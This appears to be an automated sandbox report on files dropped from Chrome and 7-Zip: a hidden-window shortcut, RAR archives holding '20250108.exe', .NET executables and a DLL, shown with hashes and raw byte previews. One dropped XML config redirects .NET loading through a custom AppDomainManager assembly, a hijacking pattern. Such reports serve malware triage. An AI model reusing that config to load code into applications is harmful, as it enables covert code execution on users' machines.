                    Preview:L..................F.@.. ...$+.,.........a..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I(Z.>....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V(Z.>....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V(Z.>....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V(Z.>..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V(Z.>...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i....................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Jan 8 06:48:42 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                    Category:dropped
                    Size (bytes):2679
                    Entropy (8bit):4.00131576648065
                    Encrypted:false
                    SSDEEP:
                    MD5:53314F95200601DE6D207F5871D327B9
                    SHA1:4D2C3820C166B4A0A3478AAA898656A10FFA23D7
                    SHA-256:F85D57EAC815AAA5E8DEB3FF7FBE553F46A7D64B7932F48161AB8FD8E943F423
                    SHA-512:A8436A75ABFFEC94B3AF71C6DCD22793CA28BB15B03EE71DE9AC803A1EB4F6F8365C1270CA0DFF2C5D9E40F729F3B27F41C6898FAC89E83FB7C9DE507024CCE6
                    Malicious:false
                    Reputation:unknown
                    Preview:L..................F.@.. ...$+.,.... ....a..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I(Z.>....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V(Z.>....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V(Z.>....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V(Z.>..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V(Z.>...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i....................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                    File Type:RAR archive data, v5
                    Category:dropped
                    Size (bytes):0
                    Entropy (8bit):0.0
                    Encrypted:false
                    SSDEEP:
                    MD5:29F37FF796320E32CE791F1840F964DF
                    SHA1:B1144BC81838AF336186B31C336CA46109B755E6
                    SHA-256:658FEB0EBC6D94CC54F67BBD60172B8190087BDC3B8229012DD245E334A47239
                    SHA-512:E145292956B5C23857371077A259462AC8B796D24E79EF91FC116D770185932A03F29E43B3EC93DFB54B4FD66281A51C9BD5007948D3D20D83790F6E3EB961AB
                    Malicious:false
                    Reputation:unknown
                    Preview:Rar!....p...............s..:......... Rt.t........./20250108.exe.....!'......VLpvDT"v`P6W...0."@..@.... . .../..e!p.PLPPTPTf.!.}. ."...#.."H..3...*...;..........]...7WW./....uuU}}....].b..... .H.0+.fdG......G@Gd.#^..i.O...a.yW.I.<e`."."K.A.|.T~|....T}.T/..............hh.k.;.i.. ..5.m.EH...I..irMKSy..v.z..<....T.....F.HoOz{..........c..........G.8a....!.%.\...F......id.oU.GT8)...x.Qw.^.c.|sis..u.....X...W....E.....jrD.........#.AYa..........G.7.....(.......I....BH..$...lBa...w"..P.../...!8q.!.....(..J.^1T...t....K..!..}....W...Q.6.....@*=...B.....u...!....fM5...U/..f.k.5N..iLo1.r...Q.K...`...0...i..+.<-.X:.~$kl..@.&.{x.oG7f..Y..5J.%p..93[./...3&...^....%=....E;F...-..5v..A./.RO.o.4.M#.S.<5s.]zC;P.......$A.J..Z.r...^I@:M.5......h%?d|M..9..I.5.e.(....v....!@....4.....]*V#.4.X..4....C..[Q......U7..F.\..C6...z.l7..C/.u..........B ,._.P..M#...#..b1#..%$. J...F...U%....[..x.....h..hi.......Z.....{.%..c...J.2..A......._.5..QCV H..(|....I.`....
                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                    File Type:RAR archive data, v5
                    Category:dropped
                    Size (bytes):0
                    Entropy (8bit):0.0
                    Encrypted:false
                    SSDEEP:
                    MD5:F9A6894970C34D34A247EABD643444EF
                    SHA1:A7B649D05F32F4D44EBDA30BF31A8C237359C95B
                    SHA-256:493A9F241F43DEF2E9251A4DBA80DC1DF372BC136C026D4661B7414551150BF0
                    SHA-512:68E3B177148258A758075DDFF07696CAE078265B6C75A4AD442ACBC28B4E0BC232257DB6EC4FCDF89F46E3C5BD7504890CA1CA314F171341BE02F5ADCCE8B83A
                    Malicious:false
                    Reputation:unknown
                    Preview:Rar!....p...............s..:......... Rt.t........./20250108.exe.....!'......VLpvDT"v`P6W...0."@..@.... . .../..e!p.PLPPTPTf.!.}. ."...#.."H..3...*...;..........]...7WW./....uuU}}....].b..... .H.0+.fdG......G@Gd.#^..i.O...a.yW.I.<e`."."K.A.|.T~|....T}.T/..............hh.k.;.i.. ..5.m.EH...I..irMKSy..v.z..<....T.....F.HoOz{..........c..........G.8a....!.%.\...F......id.oU.GT8)...x.Qw.^.c.|sis..u.....X...W....E.....jrD.........#.AYa..........G.7.....(.......I....BH..$...lBa...w"..P.../...!8q.!.....(..J.^1T...t....K..!..}....W...Q.6.....@*=...B.....u...!....fM5...U/..f.k.5N..iLo1.r...Q.K...`...0...i..+.<-.X:.~$kl..@.&.{x.oG7f..Y..5J.%p..93[./...3&...^....%=....E;F...-..5v..A./.RO.o.4.M#.S.<5s.]zC;P.......$A.J..Z.r...^I@:M.5......h%?d|M..9..I.5.e.(....v....!@....4.....]*V#.4.X..4....C..[Q......U7..F.\..C6...z.l7..C/.u..........B ,._.P..M#...#..b1#..%$. J...F...U%....[..x.....h..hi.......Z.....{.%..c...J.2..A......._.5..QCV H..(|....I.`....
                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                    File Type:RAR archive data, v5
                    Category:dropped
                    Size (bytes):16970
                    Entropy (8bit):7.988054772044822
                    Encrypted:false
                    SSDEEP:
                    MD5:F9A6894970C34D34A247EABD643444EF
                    SHA1:A7B649D05F32F4D44EBDA30BF31A8C237359C95B
                    SHA-256:493A9F241F43DEF2E9251A4DBA80DC1DF372BC136C026D4661B7414551150BF0
                    SHA-512:68E3B177148258A758075DDFF07696CAE078265B6C75A4AD442ACBC28B4E0BC232257DB6EC4FCDF89F46E3C5BD7504890CA1CA314F171341BE02F5ADCCE8B83A
                    Malicious:false
                    Reputation:unknown
                    Preview:Rar!....p...............s..:......... Rt.t........./20250108.exe.....!'......VLpvDT"v`P6W...0."@..@.... . .../..e!p.PLPPTPTf.!.}. ."...#.."H..3...*...;..........]...7WW./....uuU}}....].b..... .H.0+.fdG......G@Gd.#^..i.O...a.yW.I.<e`."."K.A.|.T~|....T}.T/..............hh.k.;.i.. ..5.m.EH...I..irMKSy..v.z..<....T.....F.HoOz{..........c..........G.8a....!.%.\...F......id.oU.GT8)...x.Qw.^.c.|sis..u.....X...W....E.....jrD.........#.AYa..........G.7.....(.......I....BH..$...lBa...w"..P.../...!8q.!.....(..J.^1T...t....K..!..}....W...Q.6.....@*=...B.....u...!....fM5...U/..f.k.5N..iLo1.r...Q.K...`...0...i..+.<-.X:.~$kl..@.&.{x.oG7f..Y..5J.%p..93[./...3&...^....%=....E;F...-..5v..A./.RO.o.4.M#.S.<5s.]zC;P.......$A.J..Z.r...^I@:M.5......h%?d|M..9..I.5.e.(....v....!@....4.....]*V#.4.X..4....C..[Q......U7..F.\..C6...z.l7..C/.u..........B ,._.P..M#...#..b1#..%$. J...F...U%....[..x.....h..hi.......Z.....{.%..c...J.2..A......._.5..QCV H..(|....I.`....
                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                    File Type:RAR archive data, v5
                    Category:dropped
                    Size (bytes):199803
                    Entropy (8bit):7.99908423662709
                    Encrypted:true
                    SSDEEP:
                    MD5:29F37FF796320E32CE791F1840F964DF
                    SHA1:B1144BC81838AF336186B31C336CA46109B755E6
                    SHA-256:658FEB0EBC6D94CC54F67BBD60172B8190087BDC3B8229012DD245E334A47239
                    SHA-512:E145292956B5C23857371077A259462AC8B796D24E79EF91FC116D770185932A03F29E43B3EC93DFB54B4FD66281A51C9BD5007948D3D20D83790F6E3EB961AB
                    Malicious:false
                    Reputation:unknown
                    Preview:Rar!....p...............s..:......... Rt.t........./20250108.exe.....!'......VLpvDT"v`P6W...0."@..@.... . .../..e!p.PLPPTPTf.!.}. ."...#.."H..3...*...;..........]...7WW./....uuU}}....].b..... .H.0+.fdG......G@Gd.#^..i.O...a.yW.I.<e`."."K.A.|.T~|....T}.T/..............hh.k.;.i.. ..5.m.EH...I..irMKSy..v.z..<....T.....F.HoOz{..........c..........G.8a....!.%.\...F......id.oU.GT8)...x.Qw.^.c.|sis..u.....X...W....E.....jrD.........#.AYa..........G.7.....(.......I....BH..$...lBa...w"..P.../...!8q.!.....(..J.^1T...t....K..!..}....W...Q.6.....@*=...B.....u...!....fM5...U/..f.k.5N..iLo1.r...Q.K...`...0...i..+.<-.X:.~$kl..@.&.{x.oG7f..Y..5J.%p..93[./...3&...^....%=....E;F...-..5v..A./.RO.o.4.M#.S.<5s.]zC;P.......$A.J..Z.r...^I@:M.5......h%?d|M..9..I.5.e.(....v....!@....4.....]*V#.4.X..4....C..[Q......U7..F.\..C6...z.l7..C/.u..........B ,._.P..M#...#..b1#..%$. J...F...U%....[..x.....h..hi.......Z.....{.%..c...J.2..A......._.5..QCV H..(|....I.`....
                    Process:C:\Program Files\7-Zip\7zG.exe
                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                    Category:dropped
                    Size (bytes):55808
                    Entropy (8bit):5.454514251686475
                    Encrypted:false
                    SSDEEP:
                    MD5:B54F6F7A63A0E20DE1A80D1C8AAA2882
                    SHA1:87219685412BD05E56DAE1162108087872DB5357
                    SHA-256:0BE7F413037A2192E3361954867B09DE0568FF53A938F73DD8BA1BDCE05C7002
                    SHA-512:908FD0444E43438AD563AED947302A8F3AE4F6AB35B115137D137F27DB932AC2B5F21658C1E04297A5A4347029B23A0645B37B87B8687A4B9D7F92BFF38B34B3
                    Malicious:false
                    Antivirus:
                    • Antivirus: ReversingLabs, Detection: 0%
                    Reputation:unknown
                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...m{(..........."...0..(..........BG... ...`....@.. .......................@......{.....`..................................F..O....`..,.................... ......8F..8............................................ ............... ..H............text...H'... ...(.................. ..`.rsrc...,....`.......*..............@..@.reloc....... ......................@..B................$G......H........&...............B...............................................0..........r...ps.......(....(..... o....(.....o......o....s....}.....{....r5..po....(....:.....rG..p(........~....(....,^~....r{..p..#...o....&.. .... `....(........,0~....(....r...p..#...%....1....(......#...o....&(....o ........rK..p..s!.........o"...&.-%~....rc..p..#...o....&(....o ........(....,%~....r...p..#...o....&(....o .......(#...-*~....r...p..#...o....&(....(....o ....Z...~....r}..p..#...o.
                    Process:C:\Program Files\7-Zip\7zG.exe
                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                    Category:dropped
                    Size (bytes):375
                    Entropy (8bit):4.9423643714213865
                    Encrypted:false
                    SSDEEP:
                    MD5:C2DDF915F0A5D4082DE665065C4A1490
                    SHA1:35B00DF2388155221AD1B22ECA29808D1335E493
                    SHA-256:66C8FB8B9BFE684F3547A0CD3C3407CC6561A5152577A296A795427D948C7F2E
                    SHA-512:263D7A0651EC7F2081B20EBAD4A92D055CFB6548C174EB55F3F06161B5F46DF88045725440B11A9A656A5DEF2FC3D1E52896C77CAB357AA69CEDB6467CD6B72E
                    Malicious:false
                    Reputation:unknown
                    Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration> .. <startup> .. <supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.0"/> .. </startup> .. <runtime> .. <appDomainManagerAssembly value="l, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null" /> .. <appDomainManagerType value="MyAppDomainManager" /> .. </runtime></configuration>
                    Process:C:\Program Files\7-Zip\7zG.exe
                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                    Category:dropped
                    Size (bytes):179712
                    Entropy (8bit):7.9589755021060915
                    Encrypted:false
                    SSDEEP:
                    MD5:F272E03CC01F612C9E8EFFADC0B0D860
                    SHA1:D990DC5FE5B9ACF38D27DC438798D75F90EAF193
                    SHA-256:06A8E8FE18CAE75E13C79DE977CE814FA8A08CC57828D07BEDC4415CD16366C9
                    SHA-512:2F0A0D30E894AA72F94577191C14A6FF85636CC05C9C78566B545C9F2B48925463DA37EB48B9EF448F8BDAA39CE7D1672A855C11301D04D51F79181100A411D4
                    Malicious:false
                    Reputation:unknown
                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....wu..........." ..0...................... ....... .......................@............`.................................P...K.......L.................... ..........................................................................H............[.kM.S...... ......................@....text............................... ..`.rsrc...L...........................@..@.................................... ..`.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................
                    No static file info